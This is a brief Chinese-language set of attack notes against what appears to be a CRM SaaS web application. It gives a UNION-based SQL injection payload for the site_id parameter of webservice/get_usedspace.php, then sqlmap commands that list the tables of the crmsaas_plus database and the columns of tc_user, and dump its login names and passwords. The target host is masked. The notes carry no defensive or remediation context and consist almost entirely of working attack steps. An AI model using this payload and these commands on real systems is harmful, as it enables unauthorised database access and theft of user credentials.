webservice/get_usedspace.php?site_id=-999 UNION ALL SELECT CONCAT(0x7e,0x7e,user(),0x7e,0x7e)--
输入语句验证是否有sql注入
直接就sqlmap
表
python sqlmap.py -u http://***/webservice/get_usedspace.php?site_id=1 -D crmsaas_plus --tables
列
python sqlmap.py -u http://***/webservice/get_usedspace.php?site_id=1 -D crmsaas_plus -T tc_user --columns
账号密码
python sqlmap.py -u http://***/webservice/get_usedspace.php?site_id=1 -D crmsaas_plus -T tc_user -C login_name,login_password --dump